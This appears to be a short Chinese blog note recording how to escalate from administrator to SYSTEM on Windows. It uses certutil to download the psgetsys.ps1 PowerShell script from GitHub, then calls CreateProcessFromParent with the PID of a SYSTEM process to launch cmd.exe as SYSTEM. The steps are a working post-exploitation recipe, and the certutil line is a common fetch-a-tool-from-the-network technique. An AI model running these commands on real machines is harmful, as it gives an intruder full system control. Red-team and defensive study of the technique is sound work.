前言

看到一篇博客讲的一个powershell脚本,下载利用后确实可以成功,特作记录。

实现

  1. 脚本下载
    certutil -urlcache -split -f https://raw.githubusercontent.com/decoder-it/psgetsystem/master/psgetsys.ps1
  2. 在windows下启动一个administrator权限的powershell
. .\psgetsys.ps1
[MyProcess]::CreateProcessFromParent(648,"c:\windows\system32\cmd.exe","")

一般情况下将上面命令中的648改为任意一个system权限的进程的pid即可,例如:
在这里插入图片描述
在这里插入图片描述

查考文章

get system

Logo

讨论HarmonyOS开发技术,专注于API与组件、DevEco Studio、测试、元服务和应用上架分发等。

更多推荐